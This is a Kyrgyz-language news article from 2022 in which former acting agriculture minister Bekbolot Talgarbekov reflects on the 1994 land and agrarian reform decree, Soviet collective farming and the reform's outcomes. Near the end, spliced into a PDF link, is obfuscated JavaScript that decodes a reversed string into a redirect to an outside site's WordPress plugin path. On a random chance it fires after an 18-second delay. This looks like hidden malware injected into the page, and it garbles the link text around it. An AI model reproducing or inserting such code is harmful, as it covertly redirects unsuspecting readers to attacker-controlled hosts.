Бекболот Талгарбеков: «Жер жана агрардык реформага 28 жыл болду»

22-февраль, 2022-ж. / Редакция / Жаңылыктар 106

Мындан туура 28 жыл мурда, 1994-жылы 22-февралда президент Аскар Акаевдин «Жер жана агрардык реформа жөнүндөгү» Жарлыгы чыккан. Улуу Октябрь социалисттик революциясынан бери башка союздук республикалардай эле айыл жеринде жүргүзүлүп келе жаткан саясий-экономикалык багыт 1994-жылдын 22-февралынан баштап түп-тамырынан бери өзгөрүүгө дуушар болгон. Айыл элине эркиндиктин жана менчиктин жолун чапкан ал саясий багытты жактагандар да, сындагандар да бар. Ошол жарлыктын ишке ашуусуна түздөн-түз тиешеси бар ошол кездеги айыл чарба министринин милдетин аткарган Бекболот Талгарбековго сөз кезегин берүүнү туура көрдүк.

АЙЫЛ ЧАРБА ЖУМУШУНА АРАЛАШКАН КҮНДӨРҮМ

Менин атам Талгарбек Кочкор районунун Дөң-Алыш айылында төрөлүп, эки жашында жетим калат. Он беш жашынан колхоздо иштей баштайт. Мен төрөлгөндө атам колхоздун башкармасы болчу. Мектепте окуганда «отличник» жана староста болчумун. Жетинчи класста сакмалга бардык. Асыран Жапаркулов деген чабанга мени жана Өмүрбек деген классташымды бөлүшкөн. Ал класстагы эң узун бойлуу, мен кыска бойлуу элем. Экөөбүздү шофёр мал сарайга жеткирип барды. Чабан Өмүрбекти алып, шофёрго «Талгарбектин баласын алып кет» деп талап койду. Мен кетпей койдум. Иш жүзүндө 56 козу багып, өстүрүп, бирин да чыгым кылбадым. Чабан кийин менден кечирим сураган. Ушундай эмгектерден улам 15 жашымда Кыргыз ССРинин тарыхында кыргыз пионерлеринин арасынан биринчи жолу СССР Жогорку Советинин чечими менен «За трудовую доблесть» деген медаль менен сыйлангам. Мектепти аяктаган соң совхоздо бир жыл жумушчу болуп иштедим. Кийинки жылы университетке өтүп, аны кызыл диплом менен аяктап, «айыл чарба экономисти» деген кесипке ээ болдум. Андан соң аспирантурада окуп, кандидаттык диссертация жактадым. 1983-91-жылдары илимдер академиясында кызматкер болгом.

 

ИЛИМ ИЗИЛДӨӨ БАГЫТЫНДА

Айыл чарбасынын натыйжалуулугу боюнча илим жактадым. Кыргыз ССР маалында экономисттердин арасынан биринчилерден болуп «Кыргызстан Ленин комсомолу сыйлыгынын лауреаты» болдум. Аспирант кезимде эле Москвада Ленин атындагы китепканада бир ай отуруп, бул темада эки жүздөй диссертацияны окуп чыктым. Баарында СССРдин айыл чарбасында толгон-токой кемчилик бар экени жазылган. Бирок бирөөндө да колхоз-совхоз системасын өзгөртүү жөнүндө айтылган эмес. Ал кезде ал мүмкүн эмес болчу. Чындыкты айрым адамдар гана айтышчу. Мисалы, публицист Геннадий Лисичкин колхоз-совхоз системасы түбү оор кризиске алып келээрин 1980-жылдары эле жазып келген. Ал эмнеге камалбай калганы белгисиз. Ошондой эле пикирди айткан орус экономисти Александр Чаянов 1937-жылы атууга кеткен.

 

«КӨЙГӨЙ СИСТЕМАДА ТУРБАЙБЫ»

Илимдеги жетекчим Жумакан Лайлиев 1983-жылы мени Москвага академик Владимир Тихоновго жөнөттү. Ал мага айтып берген маалыматтар ал кезде жарыяланчу эмес. СССРдин айыл чарбасынын зор чыгашалуу экени жөнүндө маалымат берген эле. Совет калкы 270 млн адам, айыл чарбада иштегени 45 млн. Совет өлкөсү айыл чарба продукциясы менен өз калкын эч убакта толук камсыз кыла алган эмес. АКШнын калкы 230 млн адам, фермерлердин саны болгону 3 млн. Алар өлкөсүн толук камсыздап жана экспорт кылып турушкан. Дагы бир факт — айыл чарбада иштеген бир кызматкер АКШда, Англияда 90-100 адамды, Батыш Европада 50-60 адамды, ал эми СССРде болгону 10-15 адамды өндүргөн продукция менен камсыздап турган. СССР 1970-80-жылдары АКШдан ондогон миллион тонна эгин алып турган экен. Ал он жылдык америкалык фермерлердин тарыхында «алтын доор» деп аталып калыптыр. АКШ президенти Картер 1980-жылы СССРге Афганистанга согуш ачканы үчүн эгинди сатууну токтоткон. Совет өкмөтү ал эгин алганга акчаны алтын менен төлөчү экен. Сталин өлгөндө (1953-ж.) СССРдин 2600 тонна запасы болгон. Ал эми 1990-жылы андан болгону 100 тонна калыптыр.

 

«СИСТЕМАНЫ ӨЗГӨРТҮШ КЕРЕК» ДЕГЕН ПИКИРГЕ КЕЛДИМ

Дүйнөлүк айыл чарба тарыхын казып окуп, изилдедим. Мыкты реформалардын бири дал Россияда болгон. Аларда XX кылым башында община системасы катастрофага алып бараткан. Орус падышасы Николай 1906-жылы Саратовдун губернатору Петр Столыпинди өкмөт башчысы кылып дайындайт. Ал негизги ишин айылга арнап, он миллиондогон орус дыйкандарын жер ээси кылган. Аларга жакшы шарттарды түзгөн. Россия азык-түлүк импорттоочудан экспорттоочуга айланган. Тилекке каршы, Столыпин 1911-жылы террористтин колунан каза тапкан.

Совет бийлигинин айыл чарба саясатын алты этапка бөлсөк болот. Большевиктер бийликке келгенде (1917-ж.) бардык айыл жери мамлекетке өткөн. Жаңы бийлик айылда «продразверстка» деген саясат жүргүзүп, дыйкандар өндүргөн продукцияны күч менен алып турган. Бул саясат зор зыян тийгизет. 1920-23-жылдары орус эли ачарчылыкка кабылып, 5 млн адам каза табат. Экинчи этаптагы айыл чарба саясаты Ленинге тиешелүү. Ал НЭП (жаңы экономикалык саясат) деген наам алган. Дыйкандарга соода эркиндиги берилген, айыл кооперациясы өнүккөн. НЭП жемишин берип, 1924-29-жылдары айыл чарба тынымсыз өскөн. Лениндин саясаты социализмди орнотуу максатына дал келбеген.

 

Сталин коллективдештирүүнү баштаган

Ошондуктан Сталин 1929-жылы НЭПке чекит коюп, айылда коллективдештирүүнү кескин баштаган. Ал курсту улуу жазуучу Михаил Шолохов граждандык согушка теңеген. Дыйкандар айыгышкан каршылык көрсөтүшөт, он миллиондогон малды союп жоготушат. Сталин каршыларды аёосуз жазалайт. Жалпы беш жарым миллион дыйкан атылган же Сибирге айдалган. Ортоктоштуруу кайрадан ачарчылык жаратат. Өзгөчө Украина, Повольже, Урал, Казакстан калкы азап чеккен. Бул аймактарда 5 млн адам каза болгон. Сталин айыл элинин канын төгүп, тозокко салып, СССРде ири өнөр жайды жана зор армияны кура алды.

Төртүнчү этап Никита Хрущевго таандык. Анын мамлекеттеги чакчелекей башкаруусу айыл элин жакырлантып, ачарчылыкка кайра кептеген. Бийликтеги адамдар 1964-жылы аны кызматтан алышып, ордуна Леонид Брежневди коюшкан.

Анын жетекчилигинде 1965-жылы март айында КПСС БК пленуму өтөт. Айыл жерине зор каражат бөлүнө баштайт. Кийинки он жылдык совет айыл жеринин дүркүрөп өсүп-өнүгүүсү болот. Айыл чарбада электрлештирүү, механизация ж.б. иш-чаралары күрдөөлдүү жүргүзүлөт. Совет калкында «колхоз-совхоз системасы мыкты турбайбы!» деген ишеним мээге кыт куйгандай орногон. Бирок ал системаны дайыма ири көлөмдө каржылап турууга ресурстар азайгандан азая берген. Эл аны түшүнгөн эмес, ал эми совет бийлиги социалисттик айыл чарба зор чыгашалуу экенин жашырып келген.

 

Алтынчы этап

Элде «ооруну жашырсаң өлүм ашкерелейт» деген сөз бар. Өткөн кылымдын 80-жылдары СССР жана башка социалисттик өлкөлөр айыл чарба кризисине туш келет. Буга көзү жеткен кытайдын даанышман лидери Дэн Сяопин 1978-жылы өлкөдө айыл чарба реформасын баштайт. Дыйкандарга чарбачылыкка эркиндик жана ижарага жер берилет. Тескерисинче, Михаил Горбачев 1982-жылы (ал кезде айыл чарба боюнча КПСС БК секретары) эбегейсиз каражат талап кылган «СССРдин азык-түлүк программасын» кабыл алдырган. Ал программа он жыл аралыгында ири державанын кыйрашына алып келди. Бийлик 1990-жылы азык-түлүккө талон системасын киргизүүгө аргасыз болду. Айыл чарбаны каржылоо дээрлик токтоду. Коммунисттер башкарып турган 1990-жылы Кыргыз ССРинин колхоз-совхоздорундагы 8,2 млн койдун эки миллиону айлыкка жана керектүү каражаттарды сатып алууга жумшалды.

Совет өлкөсүндө абалды түшүнгөндөр болгон. Мен (илим кызматкери элем) 1990-жылы Эстонияда академик Михаил Бронштейн менен жолуккам. Ал «жакында Литва, Латвия, Эстония СССРден бөлүнүп чыгат. Биз жерлерди 1940-жылга чейин ээлеп келишкен кожоюндарына кайтарабыз. Ал эми силерге айыл реформасын толук жүргүзүүгө кырк жыл зарыл болот» деди. «Эмне үчүн?» деген суроомо төмөндөгүдөй уламыш айтып берди: Шайтандар чогулуп, Европанын өнүккөн айыл чарбасын кимиси мыкты кыйратары боюнча мелдеш уюштурушат. Калыстар тобу шайланат. Алгач сары шайтан Европадагы айдоо талааларын өрттөп жиберет. Фермерлер эки жыл кыйналат. Анан көк шайтан айдоо талаалар аркылуу топон суу агызат. Фермерлер үч жыл кыйналат. Кезек кара шайтанга келет. Ал «мен Европа айыл чарбасына колхоз-совхоз системасын орнотом» дейт. Ошондо калыстар дароо багынып, жеңишти кара шайтанга ыйгарышат. Көрсө, сары жана көк шайтандар айдоо жерлерди кыйратышкан экен. Ал эми кара шайтан Европа фермерлеринин акыл-эсин талкаламай болуптур. Эркин чарбачылык, менчик ээси болуу дегенди жетимиш жыл бою билбеген, тааныбаган, сыйлабаган, мамлекеттин буйрук-сыйлыгы менен гана жашап-иштегенге көнгөн совет эли жеке жоопкерчиликтүү, тобокелдүү чарбачылыкка түк өткүсү келбейт тура. Андан соң академик эгерде Кыргызстан да эгемен өлкө болуп калса, анда Москванын дотациясы токтоп, аргасыздан реформага баруу зарылдыгын айтып, үч чоң тоскоолдукту эскертти.

 

Реформадагы 3 чоң тоскоолдук

Биринчи, совет айыл элинин аң-сезими ондогон жылдарда өзгөрөөрүн, демек реформа эволюциялык жол менен ишке ашырылышы керектигин айтты. Экинчи, айыл реформанын башкы аткаруучулары коммунистер болушат. Башка саясий күч ал кезде болгон эмес. Демек, алар өздөрү ээлеп, башкарып келген менчиктин элге өтүшүнө жандары кашайып, далай саботаж жасашат. Бирок аракет токтолбошу керектигин айтты. Үчүнчү, социализм доорунда эң жакшы жашагандар интеллигенция катмары болгон. Айлык акы, социалдык колдоо жакшы жана туруктуу. Анан өлкө рынок экономикасына өткөндө алар биринчи жабыр тартышат. Ошол себептен алар реформаларды жек көрүп, дагы кырк-элүү жыл реформачыларды жектешет. Шаардык интеллигенцияга эч нерсе кыла албайсыңар. Бирок айылдык интеллигенцияга, иштете алышпаса да чарбанын жер жана мал-мүлк үлүштөрүн бөлүп берүү зарылдыгын айткан эле.

 

Аскар Акаевдин доору

Кыргызстандын биринчи президенти болуп 1990-жылы октябрда Аскар Акаев шайланды. Бирок ал эч кандай айыл чарба саясатын жүргүзө алган жок. Анткени ал президент болгондо бийлиги өзүнүн он бештей аппарат кызматкерлерине гана орногон. Анык бийлик дагы деле Компартияда, облрайкомдордо, колхоз-совхоз жетекчилеринде болгон. Алар экономикалык өзгөрүүлөрдү каалашпады. Айтмакчы, ошол 1990-91-жылдары эсте калаарлык эки окуя болуп өттү. Алгач, 1990-жылы Кемин районунда райондук аткаруу комитетинин төрагасы Асанбек Акматалиевдин жетекчилиги менен «Кызыл-Суу» совхозу, Жумгал районунда башкарма Бердибек Самудиновдун демилгеси менен «Өрнөк» колхозу тарап, ал эки чарбанын калкы жер, мал-мүлктү бөлүп алып, эркин чарбачылыкка өтүп кетишти. Ал эми 1991-жылы апрелде айыл чарба кызматкерлеринин республикалык кеңешмеси өткөн. Анда айыл чарба министринин орун басары Улукбек Жээналиев сүйлөп, «өткөн бир жылда колхоз-совхоздордо эки миллион кой жок болгонун, эгер айыл чарба реформасына барбасак алдыңкы 3-4 жылда малдан толук кол жууй турганыбызды» айтты. Эгер мындай сөздү бир жыл эле мурда айтканда ал кызматынан кол жуумак.

1991-жылы 31-августта Кыргызстан эгемен өлкөгө айланып, бийлик «легендарлуу» парламентке, алардын органдары болгон облрайсоветтерге өттү. Парламент 1992-жылы экономикалык реформаларды жүргүзүү боюнча атайын программа кабыл алып, мамлекеттик мүлктү башкаруу фондун түзүп, ага реформа жүргүзүүнү тапшырды. Маммүлк фонду колхоз-совхоздорду да менчиктештирип кирди. Алардын реформасында орус реформатору Анатолий Чубайстын модели колдонулуп, алгач чыгашалуу чарбалар акционердик коомдорго айлантылып, анан аукциондо сатыла баштады. Айрым жаңы байлар (мисалы, Данияр Үсөнов, Юсуп Дунларов ж.б.) бирден совхозду толугу менен менчиктеп алышты. Маммүлк фонду 1992-93-жылдары өлкөдөгү 424 колхоз-совхоздун сексен экисин сатып жиберди.

Бизде 1990-93-жылдары бийлик же күч жок болчу. Акыры 1993-жылы жазында бириктик. Мен айыл чарба министринин милдетин аткаруучу болуп дайындалдым. Прогрессивдүү көз караштагы Жогорку Кеңештин депутаттарын, министрликтин адистерин топтодум. Президент мага айыл чарба реформасынын документин даярдоону тапшырды.

 

Акаевдин реформасы

Аскар Акаев аны парламентке жөнөттү. Эске салсак, 1993-жылы 5-майда кабыл алынган Башмыйзамга ылайык өлкөдө кош бийлик орноп, парламент үстөмдүк кылган. Депутаттар алган документти талкуулоону мындай кой, аны күн тартибине киргизбеди. Президент 1994-жылы январда референдум аркылуу Башмыйзамга өзгөртүү киргизип, президенттик башкарууну орнотту. Биз даярдаган документти эми жаңы өкмөт башчысы Апас Жумагуловго жөнөттү. Ал вице-премьер Жумгалбек Аманбаевге табыштады. Эки-үч жумадан кийин ал мени чакырды (ал кезде айыл чарба министринин 1-орун басары болчумун, министр болуп жаңы адам дайындалган). Аманбаев мага «Бекболот, мыкты документ экен. Бизге реформадан башка жол жок. Колхоз-совхоз кечээки күн. Бирок айыл чарба реформасын азыр баштабайбыз» деди. «Эмне үчүн?» деп сурадым. «Бир жыл күтө тур. Анан жаңы президент шайланат. Ал мен болом. Мен сени дароо министр кылам. Экөөбүз айыл реформасын жүргүзөбүз» деди. Президентке ал сөздү айткан жокмун. Бирок ага «бул өкмөтүңүз ал документти кабыл албайт» дедим. Ошентип, 1994-жылы 22-февралда Аскар Акаев бүт жоопкерчиликти өзүнө алып «Жер жана агрардык реформа жөнүндөгү» Жарлыкты чыгарган.

Айыл чарба реформасы жөнүндөгү документ дүйнөлүк деңгээлде даярдалган, тарыхый документ болгонун өткөн мезгил тастыктады. Айыл эли дүйнөлүк цивилизация өздөштүргөн эркиндиктин жана менчиктин чоң жолуна түштү. Айылдык ар бир жаран жерге, малга, мүлккө карата өз үлүштөрүн алуу укугуна ээ болушту. Айыл реформасын жүргүзүү укук-милдети Маммүлк фондусунун суук, кесепеттүү колунан алынып, кесипкөйлөргө, айыл чарба министрлигине берилди. Постсоветтик өлкөлөрдүн айыл чарбасын кыйратып келаткан Чубайстын чарбаларды акционерлөө модели кан буугандай токтотулду. Кыргызстанда 1994-98-жылдары айыл реформасынын биринчи этабы ийгиликтүү ишке ашты.

Мисалы, Кыргыз ССР маалында бизде жылына 500 миң тонна буудай өндүрүлчү. Калган керектөө Россия, Казакстандан келчү. Эгемен кыргыз өлкөсүндө ун тартыш болуп, ачарчылыкка кабылганбыз. Дүйнөдөн кайыр сурап калдык. Ал эми айыл чарба реформасынын төртүнчү жылы (1998-ж.) мамлекеттен бир сом албаган жаңы кыргыз эркин дыйкандары 1 млн 200 миң тонна буудай өндүрүшкөн. Бул түшүм керектөөнү 120 пайызга жеткирген. (Тилекке каршы, учурда кайра 500 миң тонна буудай өндүрүп, Казакстандан ун сурап калдык).

 

Реформа натыйжасы

1992-жылы жазында ошол кездеги айыл чарба министри «Агрардык кеңеш» деген уюм түзүп, ага колхоз-совхоз системасын жактагандарды киргизген. Алар эки жума эсеп-кысап жүргүзүп, «бардык колхоз-совхоздорду минималдык түрдө колдоп, сактап турууга 1992-жылга 16 миллиард рубль дотация керек» деген бүтүм чыгарышты. Анан ал кездеги премьер-министр Турсунбек Чыңгышевге киришип, талашып-тартышып, акыры 4 миллиард рублге токтолушту. Ал мезгилде министр да, депутаттар да «бюджет» дегенди билишкен эмес экен. Мурда баары Москвада чечилчү да. Премьер-министр какшып калган бюджеттен эптеп 150 миллион рубль бөлдүргөн. Көрсө, эгемен Кыргызстандын 1992-жылдагы бюджетинин киреше бөлүгү 2,4 миллиард рубль экен. Ал эми «Агрардык кеңеш» ал суммадан жети эсе көп акча сураптыр. Эми элестетип көрөлү. Мына, учурда Кыргызстандын 2022-жылга бекитилген бюджетинин киреше бөлүгү 282 миллиард сом. Анан азыркы эркин дыйкандар жаңы «Агрардык кеңеш» түзүп алышып, ушул жыл үчүн ал суммадан жети эсе көп, 2 триллион сом дотация сурап өкмөткө барышса кандай реакция болот эле?! Муну түшүнүүгө дагы чейрек кылым керек го. Кыргыз айыл чарба реформасынын башкы жемиши, натыйжасы дал ушул чындык. Биз системаны өзгөртө алдык. Кыргыз ССР колхоз-совхоздору миллиарддаган дотациянын күчү менен иштеп келишсе, азыркы кыргыздын эркин дыйкандары мамлекеттен бир сом дотация албай, тескерисинче, өкмөткө «тоскоол эле болбогулачы?» деп эмгектенип келатышпайбы.

 

Кемчиликтер жана тоскоолдуктар

Коммунист жетекчилер реформага көптөгөн саботаж кылышты. Шаардык интеллигенция айыл реформасын мазактап келди. Реформага каршы консерваторлор үрөн өстүрүү жана асыл-тукум мал өстүрүү адистештирилген чарбаларды реформалатпай, алардын көбүн банкрот кылышып, соңунда «мына, реформанын жыйынтыгы» деп бет тырмап баса беришти. Чүй облусунун жетекчилери айыл чарба реформасына каршы бекем турушуп, колхоз-совхоздорду «бириккен дыйкан чарбасы» деп шапкесин гана өзгөртүшүп, соңунда алар да толук банкрот болушту. Ал күнөөсүн жабыш үчүн Чүй жетекчилери Азия өнүгүү банкынан 45 млн доллар кредит алып, аны дайынсыз жоготушту. Чүйдүн болжолу 50-60 миң гектар айдоо жерин аткаминерлер жең ичинен бөлүп алышты. «Менчикке берилген койлор үч-төрт бөтөлкө аракка алмашылып жок болду» деп жүргөндөр да бар эмеспи… бул шаардык интеллигенциянын жомогу. Алар «кыргыз аракеч, жалкоо, жатып ичээр, менчикке мал-мүлк берсең эле ичип же жеп түгөтөт» деген өздөрүнүн «философиясын» ушул күнгө чейин таңуулап келатышат. Айыл элин минтип мазактоого алардын кандай акысы бар? Эгемен Кыргызстандын эркин дыйкандары мээнеткеч, күжүрмөн экенин азыр ким тана алат? Ошолор чейрек кылымдан бери өлкөбүздү багып, сактап келатышпайбы!

 

14 салык жоюлуп, 1 гана айыл чарба салыгы кирди

Жаңы дыйкандар үчүн биринчи кезекте салык системасын иретке келтирдик. Мурда колхоз-совхоздордо салык ж.б. төлөмдөрдүн саны 14 болчу. Аларды жоюп, бир гана жер салыгын киргиздик. Ал салык – дүйнөлүк эталон. 1996-жылы кирген ал система өткөн жылга чейин швейцария саатындай иштеп келди. (Учурдагы өкмөттүн ал салыкты жоюп, аны «бюджеттин эсебинен төлөп беребиз» деген чечими зор жаңылыштык). 1996-жылы Франциянын тажрыйбасын алып айыл чарбаны каржылоо системасын жакшырттык. Мурда иштеген «Агропромбанкта» 1991-95-жылдары кредиттердин кайтарымы 0,4 пайызды түзгөн. Ал жоюлуп, анын ордуна жаңы принципте иштеген «Кыргыз айыл чарба каржы корпорациясы» түзүлдү (азыр «Айылбанк»). Кредиттердин кайтарымы 99 пайызды түзүп калган. Ал эми 1998-жылы айыл чарба жерине мыйзам аркылуу жеке менчик институту киргизилди. Айылдык дыйкандар үчүн 2000-жылы жер рыногу мыйзамы кабыл алынды. Бул мыйзамдар да эч кынтыксыз, дүйнөлүк деңгээлде иштелип чыккан.

Постсоветтик өлкөлөрдө 1991-95-жылдары айыл чарба өндүрүшү орточо эки эсеге азайган. Бирок биз 2000-жылы кайра 1990-жылдын деңгээлине кайтып, андан бери темп начар болсо да өсүү гана жолундабыз. Өткөн отуз жылды алсак, айыл чарба өндүрүшү 1,5 эсеге өстү. Малдын шарттуу башы 1,5 эсеге көбөйдү. Картошка өндүрүү 5 эсеге, сүт – 1,5 эсеге, жашылча – 2 эсеге өстү. Эгер Кыргыз ССР айыл чарбасында 65 миң адам башкаруу, тескөө, текшерүү орган-аппаратында иштешсе, учурда алардын саны болгону миң адам.

 

Баары салыштырууда билинет…

Соңку отуз жылда кыргыз айыл калкына салыштырмалуу орус, түркмөн, тажик айыл калкы үч-төрт эсе, казак, өзбек калкы эки эсе начар жашап келишет. Кыргыз айыл чарба реформасын каралап, жаңы кыргыз дыйкандарын мазактап, «Акаев, Талгарбековдор колхоз-совхоздорду кыйраткан» деп келатышкан биздеги айрым дөөпөрөстөр эгер орус айыл тагдырын көрүшсө, анда муунуп өлүшмөк. Жаңы Россияда жүз миң айыл-кыштак жер жүзүнөн жоголду. 256 миллион гектар айыл чарба жерлеринен кол жуушту. Бул 22 Кыргызстандын аянты. Дагы 44 миллион гектар жерин учурда отоо чөп, куурай басып жатат. Казактардын 300 айылы түп орду менен жок болду. Дагы 1500 айыл жоголуу алдында турат. Газ өндүрүү боюнча дүйнөдө бай өлкө Түркмөнстанда азык-түлүк талон менен сатылат. Тажикстанда эл ачарчылык чегинде жашайт.

Ал эми Литва, Латвия, Эстония 1991-жылы эле колхоз-совхоздорду жоюп, рынок экономикасына өтүшкөн. Айылдагы жашоо бизден үч-төрт эсе жакшы. Ал эми колхоз-совхоздорду сактап келаткан Беларуста айыл калкынын жашоосу бизден эки эсе жакшы. Алар СССР маалындай эле ири дотация аркылуу сактап келатышат. Соңку отуз жылда Беларусь өкмөтү айыл чарбага 60 миллиард доллар дотация берди. Орус президенти Путиндин түз эфирдеги сөзүнө таянсак, Беларустун бюджетинин киреше бөлүгүнүн үчтөн бири жылыга Россиянын дотациясы менен толукталып турат. Демек, соңку 20 жылда ал сумма болжолу 80 миллиард долларды түзгөн. Кошумча айтсак, учурда Беларустун тышкы карызы асманды чапчыйт (42 миллиард доллар).

 

Реформанын экинчи жана үчүнчү этабы жасала элек

Биз 1994-98-жылдары жаңы айыл экономикасынын фундаментин түптөп (эркиндик берип) жана пайдубалын көтөрдүк (менчик ээлери кылып). Экинчи этапта айыл элине аларды зарыл каражаттар менен жабдуу (ГСМ, үрөн, техника ж.б.) жана алар өндүргөн продукцияны сатуу, кайра иштетүү, экспорттоо иштерин мамлекет уюштуруп бериши керек эле. Бул иштер 15-20 жылдан бери жасала элек. Жаңы эркин дыйкандар суукка тоңуп, ысыкка күйүп, ал иштерди өздөрү аткарып келишүүдө. Биз айыл элин жердин, мал-мүлктүн кожоюну кылдык. Ал эми рынок экономикасы толук кандуу иштеши үчүн үчүнчү этапта дыйкандар акчанын да кожоюну болушу керек эле. Бирок популист кыргыз аткаминерлери «баланча суммада кредит беребиз, үстөгүн азайтабыз» деп акчаны мамлекеттин менчигинде кармап келишет. Жеп-ичкенге ыңгайлуу да. Айтмакчы, соңку он жылда айыл чарбага арналган кредиттердин үч пайызы гана дыйкандарга жеткенин Президент Садыр Жапаров жакында элге жарыя кылды.

Эгер айыл реформасы жүргүзүлбөсө, анда айыл калкынын токсон пайызы жакырчылыкта болмок. А эгер соңку 15-20 жылда экинчи, үчүнчү этаптары да ишке ашса, анда үчтөн экиси жакшы, үчтөн бири орто жашамак. Жакырчылык болмок эмес.

 

Реформаны колдогондор

Кыргыз Республикасын 24 жыл жетектеген Турдакун Усубалиев 1995-жылдан баштап активдүү колдоп, айыл элин жаңы жашоого үгүттөп жүрдү. 2010-жылы Социалисттик Эмгектин эки жолку Баатыры Керимбүбү Шопоковага жолуккам. Ал мага «мен кырк жыл колхозго күч-кубатымды бердим. Бир чемодан толо орден, медаль, грамоталарым бар. Бирок пенсиям дары-дармекке жетпейт. Эгерде мен да азыркыдай эркин иштеп, менчик ээси болсом, анда бакубат карылык өмүр сүрмөкмүн. Акаев экөөңөрдүн реформаңарды кош колдоп кубаттайм» деди эле. 2016-жылы СССР Жогорку Советинин депутаты болгон, атактуу чабан Зайна Бейшекеевага жолугуп калдым. Ал «айыл реформасынын үзүрүн эл менен бирге мен да көрүп жатам» деп алкап жатты. Ал эми эки-үч ай эле мурда Акаев бийлигинин оппозиционерлери генерал Исмаил Исаков жана саясатчы Өмүрбек Текебаев менен чогуу болуп калдык. Алар «айыл реформасы эң туура болгон, кыргыз элин ачарчылыктан сактап калды» дешип, калыс сөзүн айтышты.

$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}too.kg/wp-content/uploads/2022/02/22_02.pdf»>2022-жылдын 22-февралы

22-февраль, 2022-ж. / Редакция / Жаңылыктар 106
Бөлүшүү: Telegram WhatsApp X